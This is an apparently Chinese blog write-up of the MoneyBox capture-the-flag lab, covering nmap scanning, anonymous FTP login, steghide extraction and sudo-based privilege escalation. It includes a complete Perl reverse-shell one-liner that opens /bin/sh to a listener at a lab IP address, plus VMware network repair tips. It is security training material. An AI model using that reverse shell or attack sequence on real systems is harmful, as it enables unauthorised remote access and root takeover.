MoneyBox靶机之FTP匿名登录漏洞、隐写术、perl 语言反弹、Vmware 无法分配IP地址的问题

已于 2023-05-12 09:05:22 修改
阅读量488 收藏
点赞数
分类专栏: 打靶 文章标签: perl 开发语言
于 2023-04-28 15:12:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40898302/article/details/130426682
版权

目录

主机发现

端口扫描

FTP匿名登录漏洞

web信息收集

隐写术

perl 语言反弹

Vmware 无法分配IP地址的问题

主机发现

arp扫描 、扫描eth0网卡所在网段的所有存活主机的ip

arp-scan -I eth0 -l

端口扫描

nmap扫描所有端口

nmap -p- 8.8.8.8

扫描端口版本信息

nmap -p21,22,80 -sV 8.8.8.8

调用nmap针对指定端口的扫描

nmap -p21 -sC 8.8.8.8

21端口漏洞

nmap -p21 -sC xxxxx

FTP匿名登录漏洞

以下特征存在可匿名登录的漏洞

ftp-anon: Anonymous FTP login allowed(FTP code 230)

登录:ftp xxx.xxx.xxx.xxx

账号密码:anonymous/anonymous

ls :查看

get:下载

get xxx.txt

kali图片查看工具

gwenview xxx.jpg

web信息收集

爆破路径

dirseach -u http://xxx.xom

查看图片隐藏的字符

strings xxx.jpg

隐写术

隐写术解密方式读取文件

steghide info xxx.jpg 查看文件是否嵌入信息

steghide extract -sf xxx.jpg 提取嵌入的信息

查看usid权限

sudo -l

查看隐藏目录

ls -a

第三个flag在/root/.root.txt,用perl弹shell需要用到sudo才能获取root权限

perl 语言反弹

perl -e 'use Socket;$i="192.168.117.130";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

linux用vim编辑文件时退格键和上下左右键失灵的问题

修改/etc/vim/vimrc.tiny文件,将set compatible改成set nocompatible,然后再添加一行set backspace=2即可

Vmware 无法分配IP地址的问题

重启虚拟机,在黑屏阶段摁住上键(Ubantu系统Shift键),选择启动菜单,点击键盘“e”,找到内核加载配置

在fi linux下

:将ro 以及后面信息改为“rw single init=/bin/bash”,然后按"Ctrl+x"进入系统

#ip a 查看网卡名称

linux系统进入

vi /etc/network/interfaces

ubuntu系统进入

vi /etc/netplan/00-installer-config.yaml

将网卡名称改为正确的网卡名称,并确定DHCP配置启动

保存后重启系统

白冷
关注
专栏目录
靶机无法获得IP地址, 该怎么办?
墨痕诉清风的博客
07-18 1713
靶机的作者通常更建议我们使用VirtualBox来运行靶机,而不是VMWare家的虚拟化产品。如果靶机启动后无法获得IP地址(扫描无法发现靶机IP),请首先使用虚拟机的重启功能(Host+R)重新启动靶机,并在重启的黑屏阶段。在学习过程中,也有部分同学遇到了一个有些共性的问题,那就是靶机启动后无法自动获得IP地址。点击键盘中字母“e”,找到内核加载的配置行,如下图所示,将其修改为单用户启动模式。将配置文件中的网卡名称修改为当前的正确名称,并确定DHCP配置启动。保存配置修改,重启计算机正常进入系统!...
[靶机渗透笔记] MONEYBOX: 1
H4ppyD0g的博客
01-23 2854
靶机链接http://www.vulnhub.com/entry/moneybox-1,653/#download 确定靶机 扫描网卡eth0所在网段的所有ip地址 sudo arp-scan -I eth0 -l -I 使用的网卡 -l 从网卡配置生成地址 nmap扫描本机所在网段所有ip地址 nmap 192.168.5.5/24 也可以只扫描主机是否开启,不扫描开启主机开启的端口信息 sudo nmap -sP 192.168.5.5/24 -sP发现扫描网络存活主机 其中192.168.
FTP协议-匿名用户登录 从0到1
2401_83799022的博客
08-21 1054
本文将介绍FTP协议、FTP匿名用户登录及其具体流程分析和自动化利用demo。如果想更进一步,可以对端口进行遍历或指定探测,与特定服务返回数据包中固定字段进行匹配识别出协议再打对应协议漏洞poc。很多人以为FTP是一个服务,实际上FTP 是一个协议而不是一个服务,应用到FTP协议的服务有很多,常用的就是vsftpd。FTP是File Transfer Protocol(文件传输协议)的简称,用于internet上的控制文件的双向传输。接下来就是整个登录的流程,包括指定用户、输入密码和登录成功。
windows下FTP匿名登录或弱口令漏洞及服务加固
01-10
漏洞描述 FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 漏洞危害 黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。 加固方案 不同 FTP 服务软件可能有不同的防护程序,本修复方案以 Windows server 2008 中自带的 FTP 服务和 Linux 中的vsftpd服务为例,您可参考以下方案对您的 FTP 服务进行安全加固。 重要提示: 请确保您的 FTP 服务软件为官方最新版本。同
FTP允许匿名登录 漏洞怎么处理
最新发布
zengliguang的专栏
10-01 780
【代码】FTP允许匿名登录 漏洞怎么处理。
FTP匿名登录或弱口令漏洞及服务加固
05-27 3542
漏洞描述 FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 漏洞危害 黑客利用弱口令或匿名登录漏洞直接登录 FTP 服务,上传恶意文件,从而获取系统权限,并可能造成数据泄露。 加固方案 不同 FTP 服务软件可能有不同的防护程序,本修复方...
FTP 未授权访问漏洞(匿名登陆)
weixin_53736204的博客
08-05 906
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。步骤一:对目标环境在资源管理器中用以下格式访问…如果该服务器开启了匿名登陆,则可直接进行内容查看。步骤一:添加ftp站点–>下一步---->分配IP无ssl----->匿名,匿名用户—>完成。虚拟机:windows server 2012。
FTP 未授权访问漏洞匿名登录
starhei.zxy的博客
08-05 393
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。对目标环境在资源管理器中用以下格式访问 如果该服务器开启了匿名登陆,则可直接进行内容查看。
FTP匿名登录)未授权访问VSFTPD2.3.4漏洞渗透
热门推荐
weixin_52347768的博客
05-05 1万+
漏洞扫描考察论文
MoneyBox 靶机笔记
MZa1213123的博客
03-05 4719
一、搜集信息 1、搭建好 MoneyBox靶机后,由于是桥接网络,用 nmap 扫描网段 nmap 10.77.192.0/24 发现目标为 10.77.192.219 继续搜集信息 nmap -sV -A 10.77.192.219 发现可以匿名 ftp 登录和开放了 80 端口还有 ssh 进网站看看有什么线索 记得看看源码(ctrl + u) 没发现什么有用的 gobuster 扫描一下网站的目录 发现 blogs 路径 继续查看该路径以及其源码
MONEYBOX靶场(打靶流程)
qq_53733257的博客
10-27 451
money靶场打靶流程
Moneybox
10-28
"Moneybox"是一个与字体相关的主题,这通常指的是一个包含多种字体资源的压缩包文件。在设计、排版和出版领域,字体的选择对于传达信息和创造视觉效果至关重要。以下是一些关于字体及其应用的重要知识点: 1. **...
ftp匿名登录 漏洞复现
HEAVEN569的博客
03-12 9955
1.FTP协议介绍 FTP,文件传输协议,是TCP/IP协议组中的协议之一属于传输层协议,由C/S(客户端/服务端)组成,默认情况下FTP协议使用TCP端口中的 20和21这两个端口。 在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。 2.FTP匿名漏洞综述 目标开启了匿名FTP服务匿名FTP允许任意用户通过FTP来访问开放的目录和文件 恶意攻击者可以通过匿名FTP来访问开放的文件或目录来收集信息进.
允许匿名登陆ftp服务器危险×××
weixin_33800593的博客
11-08 523
对于缺乏网络安全意识的网络管理员,在配置windows服务器时往往只是让web服务器能工作起来,并且打了一些常见的补丁,就认为这个服务器是很安全的了。其实也不然,当他没有注重ftp的匿名登陆的危险时,就可能产生严重漏洞。下面我们将以一个实际的例子看看匿名登陆的危险性! 在shell下,我们可以开始的ftp登陆:(假设主机为192.168.0.1) ftp 192.168....
FTP匿名访问修复方法
06-14 635
window2003 window2008 转载于:https://www.cnblogs.com/xiaozi/p/7007338.html
靶机知识点之ftp匿名登陆
不想当脚本小子的脚本小子
05-06 436
因为想做红队 所以我打算靶机方面都要做到最后一步权限维,促进学习; 很久没有玩vulnhub靶机了,过来打一打; 先探测一下靶机的ip:思路——21端口ftp暴力破解 22端口远程登陆 80端口寻找功能点 主页为一张图片 信息收集一下 感觉是拿用户名和密码然后ssh登陆提权找flag,但是似乎目前并没有搜集到什么有用的信息 但是ftp这里我还没有做什么工作 查了一下 发现他允许匿名登陆 去搜了一下相关的知识点(利用nmap -A -v参数即可得到目标具体信息) ...
FTP低权限登录漏洞复现
weixin_69925635的博客
07-14 310
使用kali集成工具netcat连接靶机FTP,这里由于没有禁止匿名用户因此可以直接利用Anonymous+pass登录。靶机:Metasploittable ip:192.168.204.130。在使用openvas对meta虚拟机进行漏洞测试时,发现高危漏洞。攻击机:kali linux。来源于21端口,现尝试复现。登入成功,完成漏洞复现。
FTP匿名登录)未授权访问漏洞复现(vsftpd2.3.4)
顾蒅' Home
09-06 8994
FTP匿名登录)未授权访问漏洞复现 0x01 漏洞简述 FTP匿名登录一般指使用FTP的用户启用了匿名登录功能,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输的, 客户在和
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值